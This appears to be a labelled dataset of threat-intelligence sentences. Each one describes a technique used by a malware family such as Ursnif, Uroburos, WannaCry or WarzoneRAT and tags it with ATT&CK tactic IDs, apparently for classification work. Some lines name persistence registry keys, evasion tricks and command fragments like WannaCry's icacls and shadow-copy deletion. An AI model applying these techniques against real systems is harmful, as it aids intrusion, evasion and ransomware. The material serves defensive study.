TrickBot has used a VNC module to monitor the victim and collect information to pivot to valuable systems on the network,['TA0008:Lateral Movement']
"TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files.",['TA0011:Command and Control']
TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine.,['TA0002:Execution']
TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Trojan.Karagany can monitor the titles of open windows to identify specific keywords.,['TA0007:Discovery']
Trojan.Karagany can secure C2 communications with SSL and TLS.,['TA0011:Command and Control']
Trojan.Karagany can steal data and credentials from browsers.,['TA0006:Credential Access']
Trojan.Karagany has used plugins with a self-delete capability.,['TA0005:Defense Evasion']
Trojan.Karagany can enumerate files and directories on a compromised host.,['TA0007:Discovery']
"Trojan.Karagany can upload, download, and execute files on the victim.",['TA0011:Command and Control']
Trojan.Karagany can capture keystrokes on a compromised host.,"['TA0009:Collection', 'TA0006:Credential Access']"
Trojan.Karagany can create directories to store plugin output and stage data for exfiltration.,['TA0009:Collection']
Trojan.Karagany can dump passwords and save them into \ProgramData\Mail\MailAg\pwds.txt.,['TA0006:Credential Access']
Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission.,['TA0005:Defense Evasion']
Trojan.Karagany can use Tasklist to collect a list of running tasks.,['TA0007:Discovery']
Trojan.Karagany can create a link to itself in the Startup folder to automatically start itself upon system restart.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Trojan.Karagany can take a desktop screenshot and save the file into \ProgramData\Mail\MailAg\shot.png.,['TA0009:Collection']
Trojan.Karagany samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.,['TA0005:Defense Evasion']
Trojan.Karagany can detect commonly used and generic virtualization platforms based primarily on drivers and file paths.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Trojan.Karagany can capture information regarding the victim's OS, security, and hardware configuration.",['TA0007:Discovery']
Trojan.Karagany can gather information on the network configuration of a compromised host.,['TA0007:Discovery']
Trojan.Karagany can use netstat to collect a list of network connections.,['TA0007:Discovery']
Trojan.Karagany can gather information about the user on a compromised host.,['TA0007:Discovery']
Trojan.Karagany can inject a suspended thread of its own process into a new process and initiate via the ResumeThread API.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Trojan.Karagany can communicate with C2 via HTTP POST requests.,['TA0011:Command and Control']
Trojan.Karagany can perform reconnaissance commands on a victim machine via a cmd.exe process.,['TA0002:Execution']
Trojan.Mebromi performs BIOS modification and can download and execute a file as well as protect itself from removal.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
"To establish persistence, Truvasys adds a Registry Run key with a value ""TaskMgr"" in an attempt to masquerade as the legitimate Windows Task Manager.",['TA0005:Defense Evasion']
Truvasys adds a Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Turian can use WinRAR to create a password-protected archive for files of interest.,['TA0009:Collection']
Turian has the ability to use a XOR decryption key to extract C2 server domains and IP addresses.,['TA0005:Defense Evasion']
Turian can search for specific files and list directories.,['TA0007:Discovery']
Turian can download additional files and tools from its C2.,['TA0011:Command and Control']
Turian can insert pseudo-random characters into its network encryption setup.,['TA0011:Command and Control']
Turian can store copied files in a specific directory prior to exfiltration.,['TA0009:Collection']
Turian can disguise as a legitimate service to blend into normal operations.,['TA0005:Defense Evasion']
Turian can use VMProtect for obfuscation.,['TA0005:Defense Evasion']
Turian can scan for removable media to collect data.,['TA0007:Discovery']
Turian has the ability to use Python to spawn a Unix shell.,['TA0002:Execution']
Turian can establish persistence by adding Registry Run keys.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Turian has the ability to take screenshots.,['TA0009:Collection']
"Turian can retrieve system information including OS version, memory usage, local hostname, and system adapter information.",['TA0007:Discovery']
Turian can retrieve the internal IP address of a compromised host.,['TA0007:Discovery']
Turian can retrieve usernames.,['TA0007:Discovery']
Turian has the ability to use /bin/sh to execute commands.,['TA0002:Execution']
Turian has the ability to use HTTP for its C2.,['TA0011:Command and Control']
Turian can create a remote shell and execute commands using cmd.,['TA0002:Execution']
UACMe contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
UBoatRAT takes advantage of the /SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
UBoatRAT has used GitHub and a public blog service in Hong Kong for C2 communications.,['TA0011:Command and Control']
UBoatRAT can upload and download files to the victim’s machine.,['TA0011:Command and Control']
UBoatRAT can list running processes on the system.,['TA0007:Discovery']
UBoatRAT encrypts instructions in its C2 network payloads using a simple XOR cipher.,['TA0011:Command and Control']
"UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
UBoatRAT has used HTTP for C2 communications.,['TA0011:Command and Control']
UBoatRAT can start a command shell.,['TA0002:Execution']
UPPERCUT has the capability to gather the victim's current directory.,['TA0007:Discovery']
UPPERCUT can download and upload files to and from the victim’s machine.,['TA0011:Command and Control']
UPPERCUT can capture desktop screenshots in the PNG format and send them to the C2 server.,['TA0009:Collection']
Some versions of UPPERCUT have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.,['TA0011:Command and Control']
UPPERCUT has the capability to gather the system’s hostname and OS version.,['TA0007:Discovery']
UPPERCUT has the capability to gather the victim's proxy information.,['TA0007:Discovery']
UPPERCUT has the capability to collect the current logged on user’s username from a machine.,['TA0007:Discovery']
UPPERCUT has the capability to obtain the time zone information and current timestamp of the victim’s machine.,['TA0007:Discovery']
"UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers.",['TA0011:Command and Control']
UPPERCUT uses cmd.exe to execute commands on the victim’s machine.,['TA0002:Execution']
"For all non-removable drives on a victim, USBStealer executes automated collection of certain files for later exfiltration.",['TA0009:Collection']
USBStealer automatically exfiltrates collected files via removable media when an infected device connects to an air-gapped victim machine after initially being connected to an internet-enabled victim machine.,['TA0010:Exfiltration']
"USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.",['TA0011:Command and Control']
"Once a removable media device is inserted back into the first victim, USBStealer collects data from it that was exfiltrated from a second victim.",['TA0009:Collection']
Most strings in USBStealer are encrypted using 3DES and XOR and reversed.,['TA0005:Defense Evasion']
USBStealer exfiltrates collected files via removable media from air-gapped victims.,['TA0010:Exfiltration']
USBStealer has several commands to delete files associated with the malware from the victim.,['TA0005:Defense Evasion']
USBStealer searches victim drives for files matching certain extensions or names.,['TA0007:Discovery']
USBStealer collects files matching certain criteria from the victim and stores them in a local directory for later exfiltration.,['TA0009:Collection']
USBStealer mimics a legitimate Russian program called USB Disk Security.,['TA0005:Defense Evasion']
"USBStealer monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.",['TA0007:Discovery']
"USBStealer registers itself under a Registry Run key with the name ""USB Disk Security.""","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
USBStealer drops itself onto removable media and relies on Autorun to execute the malicious file when a user opens the removable media on another system.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
USBStealer sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.,['TA0005:Defense Evasion']
USBferry can collect information from an air-gapped host machine.,['TA0009:Collection']
USBferry can detect the victim's file or folder list.,['TA0007:Discovery']
USBferry can use net user to gather information about local accounts.,['TA0007:Discovery']
USBferry can check for connected USB devices.,['TA0007:Discovery']
USBferry can use tasklist to gather information about the process running on the infected system.,['TA0007:Discovery']
USBferry can use net view to gather information about remote systems.,['TA0007:Discovery']
USBferry can copy its installer to attached USB storage devices.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
USBferry can execute rundll32.exe in memory to avoid detection.,['TA0005:Defense Evasion']
USBferry can detect the infected machine's network topology using ipconfig and arp.,['TA0007:Discovery']
USBferry can use netstat and nbtstat to detect active network connections.,['TA0007:Discovery']
USBferry can execute various Windows commands.,['TA0002:Execution']
Umbreon creates valid local users to provide access to the system.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Umbreon provides access to the system via SSH or any other protocol that uses PAM to authenticate.,['TA0011:Command and Control']
"Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.",['TA0005:Defense Evasion']
"Umbreon provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
"Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet",['TA0002:Execution']
Unknown Logger is capable of stealing usernames and passwords from browsers on the victim machine.,['TA0006:Credential Access']
"Unknown Logger has functionality to disable security tools, including Kaspersky, BitDefender, and MalwareBytes.",['TA0005:Defense Evasion']
Unknown Logger is capable of downloading remote files.,['TA0011:Command and Control']
Unknown Logger is capable of recording keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
Unknown Logger is capable of spreading to USB devices.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
"Unknown Logger can obtain information about the victim computer name, physical memory, country, and date.",['TA0007:Discovery']
Unknown Logger can obtain information about the victim's IP address.,['TA0007:Discovery']
Unknown Logger can obtain information about the victim usernames.,['TA0007:Discovery']
Uroburos has used a combination of a Diffie-Hellman key exchange mixed with a pre-shared key to encrypt its top layer of C2 communications.,['TA0011:Command and Control']
Uroburos has encoded outbound C2 communications in DNS requests consisting of character strings made to resemble standard domain names. The actual information transmitted by Uroburos is contained in the part of the character string prior to the first ‘.’ character.,['TA0011:Command and Control']
Uroburos can use its `Get` command to exfiltrate specified files from the compromised system.,['TA0009:Collection']
Uroburos can decrypt command parameters sent through C2 and use unpacking code to extract its packed executable.,['TA0005:Defense Evasion']
Uroburos can use DLL injection to load embedded files and modules.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"The Uroburos Queue file contains embedded executable files along with key material, communication channels, and modes of operation.",['TA0005:Defense Evasion']
Uroburos can use AES and CAST-128 encryption to obfuscate resources.,['TA0005:Defense Evasion']
Uroburos can use up to 10 channels to communicate between implants.,['TA0011:Command and Control']
Uroburos can run a `Clear Agents Track` command on an infected machine to delete Uroburos-related logs.,['TA0005:Defense Evasion']
Uroburos can search for specific files on a compromised system.,['TA0007:Discovery']
Uroburos can store configuration information for the kernel driver and kernel driver loader components in an encrypted blob typically found at `HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds.`,['TA0005:Defense Evasion']
Uroburos can use concealed storage mechanisms including an NTFS or FAT-16 filesystem encrypted with CAST-128 in CBC mode.,['TA0005:Defense Evasion']
Uroburos can use a `Put` command to write files to an infected machine.,['TA0011:Command and Control']
"Uroburos has the ability to move data between its kernel and user mode components, generally using named pipes.",['TA0002:Execution']
Uroburos can add extra characters in encoded strings to help mimic DNS legitimate requests.,['TA0011:Command and Control']
Uroburos can use custom communications protocols that ride over SMTP.,['TA0011:Command and Control']
"Uroburos has registered a service named `WerFaultSvc`, likely to spoof the legitimate Windows error reporting service.",['TA0005:Defense Evasion']
Uroburos can store configuration information in the Registry including the initialization vector and AES key needed to find and decrypt other Uroburos components.,['TA0005:Defense Evasion']
Individual Uroburos implants can use multiple communication channels based on one of four available modes of operation.,['TA0011:Command and Control']
Uroburos can use implants on multiple compromised machines to proxy communications through its worldwide P2P network.,['TA0011:Command and Control']
Uroburos can use native Windows APIs including `GetHostByName`.,['TA0002:Execution']
"Uroburos can communicate through custom methodologies for UDP, ICMP, and TCP that use distinct sessions to ride over the legitimate protocols.",['TA0011:Command and Control']
Uroburos can use a custom base62 and a de-facto base32 encoding that uses digits 0-9 and lowercase letters a-z in C2 communications.,['TA0011:Command and Control']
Uroburos can use its `Process List` command to enumerate processes on compromised hosts.,['TA0007:Discovery']
"Uroburos has the ability to communicate over custom communications methodologies that ride over common network protocols including raw TCP and UDP sockets, HTTP, SMTP, and DNS.",['TA0011:Command and Control']
"Uroburos can use custom communication methodologies that ride over common protocols including TCP, UDP, HTTP, SMTP, and DNS in order to blend with normal network traffic.",['TA0011:Command and Control']
"Uroburos can query the Registry, typically `HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds`, to find the key and path to decrypt and load its kernel driver and kernel driver loader.",['TA0007:Discovery']
Uroburos has the ability to load new modules directly into memory using its `Load Modules Mem` command.,['TA0005:Defense Evasion']
Uroburos can use its kernel module to prevent its host components from being listed by the targeted system's OS and to mediate requests between user mode and concealed components.,['TA0005:Defense Evasion']
Uroburos uses a custom packer.,['TA0005:Defense Evasion']
"Uroburos can encrypt the data beneath its http2 or tcp encryption at the session layer with CAST-128, using a different key for incoming and outgoing data.",['TA0011:Command and Control']
Uroburos has the ability to gather basic system information and run the POSIX API `gethostbyname`.,['TA0007:Discovery']
"Uroburos can intercept the first client to server packet in the 3-way TCP handshake to determine if the packet contains the correct unique value for a specific Uroburos implant. If the value does not match, the packet and the rest of the TCP session are passed to the legitimate listening application.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Uroburos can use a custom HTTP-based protocol for large data communications that can blend with normal network traffic by riding on top of standard HTTP.,['TA0011:Command and Control']
Uroburos has the ability to use the command line for execution on the targeted system.,['TA0002:Execution']
"Uroburos has registered a service, typically named `WerFaultSvc`, to decrypt and find a kernel driver and kernel driver loader to maintain persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ursnif has injected HTML codes into banking sites to steal sensitive online banking information .,['TA0009:Collection']
Ursnif droppers execute base64 encoded PowerShell commands.,['TA0005:Defense Evasion']
Ursnif droppers have used COM objects to execute the malware's full executable payload.,['TA0002:Execution']
"Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.","['TA0009:Collection', 'TA0006:Credential Access']"
Ursnif has used encoded data in HTTP URLs for C2.,['TA0011:Command and Control']
"Ursnif has collected files from victim machines, including certificates and cookies.",['TA0009:Collection']
Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.,['TA0005:Defense Evasion']
Ursnif has used a DGA to generate domain names for C2.,['TA0011:Command and Control']
Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk. Ursnif droppers have also been delivered as password-protected zip files that execute base64 encoded PowerShell commands.,['TA0005:Defense Evasion']
Ursnif has used HTTP POSTs to exfil gathered information.,['TA0010:Exfiltration']
Ursnif has deleted data staged in tmp files after exfiltration.,['TA0005:Defense Evasion']
Ursnif droppers have used COM properties to execute malware in hidden windows.,['TA0005:Defense Evasion']
Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.,['TA0011:Command and Control']
Ursnif has used tmp files to stage gathered information.,['TA0009:Collection']
"Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.",['TA0005:Defense Evasion']
Ursnif has used Registry modifications as part of its installation routine.,['TA0005:Defense Evasion']
Ursnif has used Tor for C2.,['TA0011:Command and Control']
Ursnif has used CreateProcessW to create child processes.,['TA0002:Execution']
Ursnif droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.,['TA0002:Execution']
Ursnif has gathered information about running processes.,['TA0007:Discovery']
Ursnif has used process hollowing to inject into child processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Ursnif has used a peer-to-peer network for C2.,['TA0011:Command and Control']
Ursnif has used Reg to query the Registry for installed programs.,['TA0007:Discovery']
Ursnif has used Registry Run keys to establish automatic execution at system startup.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ursnif has copied itself to and infected removable drives for propagation.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
Ursnif has used hooked APIs to take screenshots.,['TA0009:Collection']
Ursnif has used Systeminfo to gather system information.,['TA0007:Discovery']
Ursnif has gathered information about running services.,['TA0007:Discovery']
Ursnif has copied itself to and infected files in network drives for propagation.,['TA0008:Lateral Movement']
Ursnif has injected code into target processes via thread local storage callbacks.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Ursnif has used a 30 minute delay after execution to evade sandbox monitoring tools.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Ursnif droppers have used VBA macros to download and execute the malware's full executable payload.,['TA0002:Execution']
Ursnif has used HTTPS for C2.,['TA0011:Command and Control']
Ursnif droppers have used WMI classes to execute PowerShell commands.,['TA0002:Execution']
Ursnif has registered itself as a system service in the Registry for automatic execution at system startup.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
VBShower has attempted to complicate forensic analysis by deleting all the files contained in %APPDATA%\..\Local\Temporary Internet Files\Content.Word and %APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\.,['TA0005:Defense Evasion']
VBShower has the ability to download VBS files to the target computer.,['TA0011:Command and Control']
VBShower used HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\a-f0-9A-F{8} to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
VBShower has the ability to execute VBScript files.,['TA0002:Execution']
VBShower has attempted to obtain a VBS script from command and control nodes over HTTP.,['TA0011:Command and Control']
VERMIN encrypts the collected files using 3-DES.,['TA0009:Collection']
VERMIN can perform audio capture.,['TA0009:Collection']
VERMIN saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt .,['TA0009:Collection']
VERMIN collects data stored in the clipboard.,['TA0009:Collection']
"VERMIN decrypts code, strings, and commands to use once it's on the victim's machine.",['TA0005:Defense Evasion']
VERMIN is obfuscated using the obfuscation tool called ConfuserEx.,['TA0005:Defense Evasion']
VERMIN can delete files on the victim’s machine.,['TA0005:Defense Evasion']
VERMIN can download and upload files to the victim's machine.,['TA0011:Command and Control']
VERMIN collects keystrokes from the victim machine.,"['TA0009:Collection', 'TA0006:Credential Access']"
VERMIN can get a list of the processes and running tasks on the system.,['TA0007:Discovery']
VERMIN can perform screen captures of the victim’s machine.,['TA0009:Collection']
VERMIN uses WMI to check for anti-virus software installed on the system.,['TA0007:Discovery']
VERMIN is initially packed.,['TA0005:Defense Evasion']
"VERMIN collects the OS name, machine name, and architecture information.",['TA0007:Discovery']
VERMIN gathers the local IP address.,['TA0007:Discovery']
VERMIN gathers the username from the victim’s machine.,['TA0007:Discovery']
VERMIN uses HTTP for C2 communications.,['TA0011:Command and Control']
VPNFilter has the capability to wipe a portion of an infected device's firmware.,['TA0040:Impact']
Valak can download a module to search for and build a report of harvested credential data.,['TA0009:Collection']
Valak can use the clientgrabber module to steal e-mail credentials from the Registry.,['TA0006:Credential Access']
Valak has the ability to decode and decrypt downloaded files.,['TA0005:Defense Evasion']
Valak has the ability to enumerate domain admin accounts.,['TA0007:Discovery']
Valak can execute tasks via OLE.,['TA0002:Execution']
Valak has the ability to exfiltrate data over the C2 channel.,['TA0010:Exfiltration']
Valak can communicate over multiple C2 hosts.,['TA0011:Command and Control']
Valak has the ability to store information regarding the C2 server and downloads in the Registry key HKCU\Software\ApplicationContainer\Appsw64.,['TA0005:Defense Evasion']
"Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.",['TA0011:Command and Control']
Valak can execute JavaScript containing configuration data for establishing persistence.,['TA0002:Execution']
Valak has the ability to enumerate local admin accounts.,['TA0007:Discovery']
Valak has been executed via Microsoft Word documents containing malicious macros.,['TA0002:Execution']
Valak has the ability to modify the Registry key HKCU\Software\ApplicationContainer\Appsw64 to store information regarding the C2 server and downloads.,['TA0005:Defense Evasion']
Valak can download additional modules and malware capable of using separate C2 channels.,['TA0011:Command and Control']
Valak has the ability save and execute files as alternate data streams .,['TA0005:Defense Evasion']
Valak has the ability to base64 encode and XOR encrypt strings.,['TA0005:Defense Evasion']
Valak has used PowerShell to download additional modules.,['TA0002:Execution']
Valak has the ability to enumerate running processes on a compromised host.,['TA0007:Discovery']
Valak can use the Registry for code updates and to collect credentials.,['TA0007:Discovery']
Valak has used regsvr32.exe to launch malicious DLLs.,['TA0005:Defense Evasion']
"Valak can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.",['TA0009:Collection']
Valak has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Valak has the ability to take screenshots on a compromised host.,['TA0009:Collection']
Valak can determine if a compromised host has security products installed.,['TA0007:Discovery']
Valak has used packed DLL payloads.,['TA0005:Defense Evasion']
Valak has been delivered via spearphishing e-mails with password protected ZIP files.,['TA0001:Initial Access']
Valak has been delivered via malicious links in e-mail.,['TA0001:Initial Access']
Valak has returned C2 data as encoded ASCII.,['TA0011:Command and Control']
Valak can determine the Windows version and computer name on a compromised host.,['TA0007:Discovery']
Valak has the ability to identify the domain and the MAC and IP addresses of an infected machine.,['TA0007:Discovery']
Valak can gather information regarding the user.,['TA0007:Discovery']
Valak has used HTTP in communications with C2.,['TA0011:Command and Control']
Valak can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.,['TA0006:Credential Access']
Valak can use wmic process call create in a scheduled task to launch plugins and for execution.,['TA0002:Execution']
VaporRage can deobfuscate XOR-encoded shellcode prior to execution.,['TA0005:Defense Evasion']
VaporRage has the ability to check for the presence of a specific DLL and terminate if it is not found.,['TA0005:Defense Evasion']
VaporRage has the ability to download malicious shellcode to compromised systems.,['TA0011:Command and Control']
VaporRage can use HTTP to download shellcode from compromised websites.,['TA0011:Command and Control']
Vasport can download files.,['TA0011:Command and Control']
Vasport is capable of tunneling though a proxy.,['TA0011:Command and Control']
Vasport copies itself to disk and creates an associated run key Registry entry to establish.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Vasport creates a backdoor by making a connection using a HTTP POST.,['TA0011:Command and Control']
VersaMem was delivered as a Java Archive that runs by attaching itself to the Apache Tomcat Java servlet and web server.,['TA0002:Execution']
"VersaMem hooked and overrided Versa's built-in authentication method, `setUserPassword`, to intercept plaintext credentials when submitted to the server.","['TA0009:Collection', 'TA0006:Credential Access']"
VersaMem encrypted captured credentials with AES then Base64 encoded them before writing to local storage.,['TA0005:Defense Evasion']
VersaMem was installed through exploitation of CVE-2024-39717 in Versa Director servers.,['TA0002:Execution']
VersaMem deleted files related to initial installation such as temporary files related to the PID of the main web process.,['TA0005:Defense Evasion']
VersaMem staged captured credentials locally at `/tmp/.temp.data`.,['TA0009:Collection']
"VersaMem hooked the Catalina application filter chain `doFilter` on compromised systems to monitor all inbound requests to the local Tomcat web server, inspecting them for parameters like passwords and follow-on Java modules.","['TA0006:Credential Access', 'TA0007:Discovery']"
VersaMem relied on the Java Instrumentation API and Javassist to dynamically modify Java code existing in memory.,['TA0002:Execution']
Some Volgmer variants use SSL to encrypt C2 communications.,['TA0011:Command and Control']
Volgmer deobfuscates its strings and APIs once its executed.,['TA0005:Defense Evasion']
A Volgmer variant is encoded using a simple XOR cipher.,['TA0005:Defense Evasion']
Volgmer can delete files and itself after infection to avoid analysis.,['TA0005:Defense Evasion']
Volgmer can list directories on a victim.,['TA0007:Discovery']
Volgmer stores an encoded configuration file in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security.,['TA0005:Defense Evasion']
Volgmer can download remote files and additional payloads to the victim's machine.,['TA0011:Command and Control']
"Some Volgmer variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.",['TA0005:Defense Evasion']
Volgmer modifies the Registry to store an encoded configuration file in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security.,['TA0005:Defense Evasion']
Volgmer executes payloads using the Windows API call CreateProcessW.,['TA0002:Execution']
Volgmer can gather a list of processes.,['TA0007:Discovery']
Volgmer checks the system for certain Registry keys.,['TA0007:Discovery']
Volgmer uses a simple XOR cipher to encrypt traffic and files.,['TA0011:Command and Control']
"Volgmer can gather system information, the computer name, OS version, drive and serial information from the victim's machine.",['TA0007:Discovery']
Volgmer can gather the IP address from the victim's machine.,['TA0007:Discovery']
Volgmer can gather information about TCP connection state.,['TA0007:Discovery']
Volgmer queries the system to identify existing services.,['TA0007:Discovery']
Volgmer can execute commands on the victim's machine.,['TA0002:Execution']
"Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some Volgmer variants also install .dll files as services with names generated by a list of hard-coded strings.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
WARPWIRE can embed itself into a legitimate file on compromised Ivanti Connect Secure VPNs.,['TA0003:Persistence']
WARPWIRE can send captured credentials to C2 via HTTP `GET` or `POST` requests.,['TA0010:Exfiltration']
WARPWIRE is a credential harvester written in JavaScript.,['TA0002:Execution']
WARPWIRE can Base64 encode captured credentials with `btoa` prior to sending to C2.,['TA0011:Command and Control']
WARPWIRE can capture credentials submitted during the web logon process in order to access layer seven applications such as RDP.,"['TA0009:Collection', 'TA0006:Credential Access']"
"Variants of WEBC2 achieve persistence by using DLL search order hijacking, usually by copying the DLL file to %SYSTEMROOT% .","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
WEBC2 can download and execute a file.,['TA0011:Command and Control']
WEBC2 can open an interactive command shell.,['TA0002:Execution']
WINDSHIELD is capable of file deletion along with other file system interaction.,['TA0005:Defense Evasion']
WINDSHIELD C2 traffic can communicate via TCP raw sockets.,['TA0011:Command and Control']
WINDSHIELD can gather Registry values.,['TA0007:Discovery']
WINDSHIELD can gather the victim computer name.,['TA0007:Discovery']
WINDSHIELD can gather the victim user name.,['TA0007:Discovery']
WINERACK can enumerate active windows.,['TA0007:Discovery']
WINERACK can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.,['TA0002:Execution']
WINERACK can enumerate files and directories.,['TA0007:Discovery']
WINERACK can enumerate processes.,['TA0007:Discovery']
WINERACK can gather information about the host.,['TA0007:Discovery']
WINERACK can gather information on the victim username.,['TA0007:Discovery']
WINERACK can enumerate services.,['TA0007:Discovery']
WIREFIRE can modify the `visits.py` component of Ivanti Connect Secure VPNs for file download and arbitrary command execution.,['TA0003:Persistence']
"WIREFIRE can decode, decrypt, and decompress data received in C2 HTTP `POST` requests.",['TA0005:Defense Evasion']
WIREFIRE has the ability to download files to compromised devices.,['TA0011:Command and Control']
WIREFIRE can Base64 encode process output sent to C2.,['TA0011:Command and Control']
WIREFIRE can AES encrypt process output sent from compromised devices to C2.,['TA0011:Command and Control']
WIREFIRE can respond to specific HTTP `POST` requests to `/api/v1/cav/client/visits`.,['TA0011:Command and Control']
WIREFIRE is a web shell that can download files to and execute arbitrary commands from compromised Ivanti Connect Secure VPNs.,['TA0003:Persistence']
WannaCry uses Tor for command and control traffic and routes a custom cryptographic protocol over the Tor circuit.,['TA0011:Command and Control']
WannaCry encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.,['TA0040:Impact']
WannaCry uses an exploit in SMBv1 to spread itself to other remote systems on a network.,['TA0008:Lateral Movement']
"WannaCry searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive/compression format, and key and certificate files.",['TA0007:Discovery']
WannaCry uses attrib +h to make some of its files hidden.,['TA0005:Defense Evasion']
"WannaCry uses vssadmin, wbadmin, bcdedit, and wmic to delete and disable operating system recovery features.",['TA0040:Impact']
WannaCry attempts to copy itself to remote computers after gaining access via an SMB exploit.,['TA0008:Lateral Movement']
WannaCry uses Tor for command and control traffic.,['TA0011:Command and Control']
"WannaCry contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device.",['TA0007:Discovery']
WannaCry enumerates current remote desktop sessions and tries to execute the malware on each session.,['TA0008:Lateral Movement']
WannaCry scans its local network segment for remote systems to try to exploit and copy itself to.,['TA0007:Discovery']
"WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.",['TA0040:Impact']
WannaCry will attempt to determine the local network segment it is a part of.,['TA0007:Discovery']
WannaCry uses attrib +h and icacls . /grant Everyone:F /T /C /Q to make some of its files hidden and grant all users full access controls.,['TA0005:Defense Evasion']
WannaCry utilizes wmic to delete shadow copies.,['TA0002:Execution']
"WannaCry creates the service ""mssecsvc2.0"" with the display name ""Microsoft Security Center Service.""","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
WarzoneRAT can use `sdclt.exe` to bypass UAC in Windows 10 to escalate privileges; for older Windows versions WarzoneRAT can use the IFileOperation exploit to bypass the UAC module.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
WarzoneRAT can perform COM hijacking by setting the path to itself to the `HKCU\Software\Classes\Folder\shell\open\command` key with a `DelegateExecute` parameter.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
WarzoneRAT has the capability to grab passwords from numerous web browsers as well as from Outlook and Thunderbird email clients.,['TA0006:Credential Access']
WarzoneRAT can collect data from a compromised host.,['TA0009:Collection']
WarzoneRAT can use XOR 0x45 to decrypt obfuscated code.,['TA0005:Defense Evasion']
WarzoneRAT can disarm Windows Defender during the UAC process to evade detection.,['TA0005:Defense Evasion']
WarzoneRAT can send collected victim data to its C2 server.,['TA0010:Exfiltration']
WarzoneRAT can enumerate directories on a compromise host.,['TA0007:Discovery']
WarzoneRAT has the ability of performing remote desktop access via a hVNC window for decreased visibility.,['TA0005:Defense Evasion']
WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide its attempts to elevate privileges through `IFileOperation`.,['TA0005:Defense Evasion']
WarzoneRAT can download and execute additional files.,['TA0011:Command and Control']
